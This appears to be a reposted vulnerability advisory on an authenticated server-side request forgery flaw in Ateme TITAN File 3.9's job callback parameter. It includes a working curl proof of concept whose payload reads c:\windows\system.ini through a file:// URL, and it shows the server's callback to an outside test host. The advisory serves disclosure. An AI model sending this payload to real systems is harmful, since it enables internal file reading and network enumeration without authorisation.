Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

2023.07.13
Credit: LiquidWorm
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.9.12.4 3.9.11.0 3.9.9.2 3.9.8.0 Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing. Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application. Tested on: Microsoft Windows NodeJS Ateme KFE Software Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5781 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php 22.04.2023 -- curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \ -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \ -H "User-Agent: sunee-mode" \ "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>" Call to file://C:\\windows\\system.ini returned 0 --- HTTP from Server ---------------- POST / HTTP/1.1 Host: ssrftest.zeroscience.mk Accept: */* Content-Type: application/xml Content-Length: 192 <?xml version='1.0' encoding='UTF-8' ?> <update> <id>0000</id> <name>dummy test job</name> <status>aborted</status> <progress>50</progress> <message>message</message> </update>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top